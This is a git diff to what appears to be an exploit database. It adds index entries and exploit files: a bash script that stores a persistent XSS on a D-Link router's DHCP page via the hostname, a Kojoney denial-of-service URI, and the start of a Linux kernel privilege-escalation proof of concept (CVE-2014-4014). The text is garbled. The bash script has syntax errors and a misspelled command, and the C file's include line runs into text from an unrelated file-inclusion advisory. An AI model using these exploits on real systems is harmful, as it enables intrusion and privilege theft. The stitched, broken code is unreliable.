diff --git a/files.csv b/files.csv
index 7ecf8ad17..8a3b9fdf4 100755
--- a/files.csv
+++ b/files.csv
@@ -30336,6 +30336,7 @@ id,file,description,date,author,platform,type,port
33664,platforms/multiple/remote/33664.html,"Mozilla Firefox <= 3.5.8 Style Sheet Redirection Information Disclosure Vulnerability",2010-01-09,"Cesar Cerrudo",multiple,remote,0
33665,platforms/php/webapps/33665.txt,"Softbiz Jobs 'sbad_type' Parameter Cross Site Scripting Vulnerability",2010-02-23,"pratul agrawal",php,webapps,0
33671,platforms/php/webapps/33671.txt,"MySmartBB 1.7 Multiple Cross Site Scripting Vulnerabilities",2010-02-24,indoushka,php,webapps,0
+33672,platforms/linux/dos/33672.txt,"Kojoney 0.0.4.1 - 'urllib.urlopen()' Remote Denial of Service Vulnerability",2010-02-24,Nicob,linux,dos,0
33673,platforms/php/webapps/33673.pl,"HD FLV Player Component for Joomla! 'id' Parameter SQL Injection Vulnerability",2010-02-24,kaMtiEz,php,webapps,0
33674,platforms/php/webapps/33674.txt,"OpenInferno OI.Blogs 1.0 Multiple Local File Include Vulnerabilities",2010-02-24,JIKO,php,webapps,0
33675,platforms/jsp/webapps/33675.txt,"Multiple IBM Products Login Page Cross Site Scripting Vulnerability",2010-02-25,"Oren Hafif",jsp,webapps,0
@@ -30456,6 +30457,7 @@ id,file,description,date,author,platform,type,port
33804,platforms/windows/dos/33804.pl,"Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow Vulnerability",2014-06-18,LiquidWorm,windows,dos,0
33807,platforms/multiple/remote/33807.rb,"Rocket Servergraph Admin Center fileRequestor Remote Code Execution",2014-06-18,metasploit,multiple,remote,8888
33808,platforms/linux/local/33808.c,"docker 0.11 VMM-container Breakout",2014-06-18,"Sebastian Krahmer",linux,local,0
+33809,platforms/php/webapps/33809.txt,"Cacti Superlinks Plugin 1.4-2 - SQL Injection",2014-06-18,Napsterakos,php,webapps,0
33810,platforms/osx/remote/33810.html,"Apple Safari for iPhone/iPod touch Malformed 'Throw' Exception Remote Code Execution Vulnerability",2010-03-26,"Nishant Das Patnaik",osx,remote,0
33811,platforms/osx/remote/33811.html,"Apple Safari iPhone/iPod touch Malformed Webpage Remote Code Execution Vulnerability",2010-03-26,"Nishant Das Patnaik",osx,remote,0
33812,platforms/php/webapps/33812.txt,"Joomla! 'com_weblinks' Component 'id' Parameter SQL Injection Vulnerability",2010-03-29,"Pouya Daneshmand",php,webapps,0
@@ -30466,3 +30468,8 @@ id,file,description,date,author,platform,type,port
33817,platforms/windows/remote/33817.rb,"Ericom AccessNow Server Buffer Overflow",2014-06-19,metasploit,windows,remote,8080
33818,platforms/php/webapps/33818.txt,"web2Project 3.1 - Multiple Vulnerabilities",2014-06-19,"High-Tech Bridge SA",php,webapps,80
33819,platforms/windows/dos/33819.txt,"McAfee Email Gateway Prior To 6.7.2 Hotfix 2 Multiple Vulnerabilities",2010-04-06,"Nahuel Grisolia",windows,dos,0
+33820,platforms/php/webapps/33820.txt,"PotatoNews 1.0.2 'nid' Parameter Multiple Local File Include Vulnerabilities",2010-04-07,mat,php,webapps,0
+33821,platforms/php/webapps/33821.html,"n-cms-equipe 1.1c.Debug Multiple Local File Include Vulnerabilities",2010-02-24,ITSecTeam,php,webapps,0
+33822,platforms/hardware/webapps/33822.sh,"D-link DSL-2760U-E1 - Persistent XSS",2014-06-21,"Yuval tisf Nativ",hardware,webapps,0
+33823,platforms/php/webapps/33823.txt,"Wordpress 3.9.1 - CSRF vulnerabilities",2014-06-21,"Avinash Thapa",php,webapps,0
+33824,platforms/linux/local/33824.c,"Linux Kernel <= 3.13 - Local Privilege Escalation PoC (gid)",2014-06-21,"Vitaly Nikolenko",linux,local,0
diff --git a/platforms/hardware/webapps/33822.sh b/platforms/hardware/webapps/33822.sh
new file mode 100755
index 000000000..136485c67
--- /dev/null
+++ b/platforms/hardware/webapps/33822.sh
@@ -0,0 +1,32 @@
+#!/bin/bash
+
+# Written and discovered by Yuval tisf Nativ
+# The page 'dhcpinfo.html' will list all machines connected to the network with hostname,
+# IP, MAC and IP expiration. It is possible to store an XSS in this table by changing hostname.
+
+# Checks if you are root
+if [ "$(id -u)" != "0" ]; then
+ echo "Please execute this script as root"
+ exit 1
+fi
+
+# You're XSS here
+xss = "\""
+
+# backup current hostname
+currhost = `hostname`
+
+# Bannering
+echo ""
+echo " D-Link Persistent XSS by tisf"
+echo ""
+echo "The page dhcpinfo.html is the vulnerable page."
+echo "Ask the user to access it and your persistent XSS will be triggered."
+echo ""
+
+# Change hostname to XSS
+sudo hosname $xss
+
+# Restore previous hostname on exit
+pause "Type any key to exit and restore your previous hostname."
+sudo hostname $currhost
diff --git a/platforms/linux/dos/33672.txt b/platforms/linux/dos/33672.txt
new file mode 100755
index 000000000..db18af034
--- /dev/null
+++ b/platforms/linux/dos/33672.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/38395/info
+
+Kojoney is prone to a remote denial-of-service vulnerability.
+
+A remote attacker can exploit this issue to gain unauthorized access to local files and crash the affected application, resulting in a denial-of-service condition.
+
+Versions prior to Kojoney 0.0.4.2 are vulnerable.
+
+The following example URI is available:
+
+file://localhost/dev/urandom
\ No newline at end of file
diff --git a/platforms/linux/local/33824.c b/platforms/linux/local/33824.c
new file mode 100755
index 000000000..c669bbb35
--- /dev/null
+++ b/platforms/linux/local/33824.c
@@ -0,0 +1,72 @@
+/**
+ * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC
+ *
+ * Vitaly Nikolenko
+ * http://hashcrack.org
+ *
+ * Usage: ./poc [file_path]
+ *
+ * where file_path is the file on which you want to set the sgid bit
+ */
+#define _GNU_SOURCE
+#include N'CMS & N'Games local file include Vulnerability vul1 file:/path/template/theme1/content/body.php vul2 file:/path/template/theme1/content/includs.php -----------------------------------